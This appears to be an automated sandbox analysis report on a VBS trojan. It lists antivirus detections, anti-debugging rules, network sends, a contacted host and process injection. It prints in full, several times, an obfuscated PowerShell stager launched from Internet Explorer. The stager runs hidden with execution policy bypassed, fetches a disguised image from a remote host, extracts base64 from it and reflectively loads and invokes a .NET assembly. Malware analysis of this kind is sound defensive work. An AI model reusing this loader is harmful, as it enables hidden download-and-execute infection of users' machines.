Data sent €ýlo¢…»°S·Ôz9Ý[E–¾CÙä?Zô£?¥›ÙìhŒBî1 :ݤz°K΍¯>B˜;ªF"v¼n±æ=p“Å€ÍÅÿé ©ÞÊR?O8§CƒÖsöL+®zq*¹9ÿf¦Mt‹™€§9iž´»­Vb
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2692 CREDAT:145409
host 185.196.8.176
FireEye VB:Trojan.Valyria.8400
ALYac VB:Trojan.Valyria.8400
Symantec Scr.Malscript!gen11
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8400
NANO-Antivirus Trojan.Script.Hworm.dmiour
MicroWorld-eScan VB:Trojan.Valyria.8400
Rising Trojan.Agent/VBS!1.EAE0 (CLASSIC)
VIPRE VB:Trojan.Valyria.8400
Emsisoft VB:Trojan.Valyria.8400 (B)
GData VB:Trojan.Valyria.8400
MAX malware (ai score=82)
Arcabit VB:Trojan.Valyria.D20D0
Google Detected
Ikarus Trojan.VBS.Agent
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

send

buffer: qme@¾´ÉÝ=uU™¸ûXU¤G5nå ×k€ƒ?–J|Ü/5 ÀÀÀ À 28,ÿimageupload.io  
socket: 1280
sent: 118
1 118 0

send

buffer: FBA ®W謲•d¥âƒÿxW”Åß×{Î|ëh÷øqpϦèiÀlf$yÊmï²í0[YdöWæHtæe;rÚ…0 $›.øÚPõ£´ƒ&¼ëki”™Øaê¥5ݜþn÷䪎´©{ïbk¢y¸Iò.
socket: 1280
sent: 134
1 134 0

send

buffer: €ýlo¢…»°S·Ôz9Ý[E–¾CÙä?Zô£?¥›ÙìhŒBî1 :ݤz°K΍¯>B˜;ªF"v¼n±æ=p“Å€ÍÅÿé ©ÞÊR?O8§CƒÖsöL+®zq*¹9ÿf¦Mt‹™€§9iž´»­Vb
socket: 1280
sent: 133
1 133 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€b€€Bw€€GE€€VwBs€€H€€€€YQBX€€Gw€€c€€Bh€€Fc€€b€€Bw€€GE€€VwB0€€HY€€YgBH€€FI€€c€€Bi€€DM€€SgBr€€Ew€€egBR€€DM€€TQBT€€DQ€€MwBN€€Hk€€N€€€€w€€E4€€V€€BJ€€HU€€TgBU€€Gc€€e€€BM€€Hk€€O€€€€2€€GM€€S€€BS€€D€€€€YQBB€€D0€€PQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bm€€GQ€€ZgBk€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€Cc€€I€€€€s€€C€€€€JwBk€€GE€€Z€€Bz€€GE€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZQ€€n€€C€€€€L€€€€g€€Cc€€YwB1€€Cc€€KQ€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmlpaWlpaWlpaWlpaWtvbGRpb3JkLzQ3MS43My40NTIuNTgxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Process injection Process 2692 resumed a thread in remote process 2780
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000360
suspend_count: 1
process_identifier: 2780
1 0 0
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe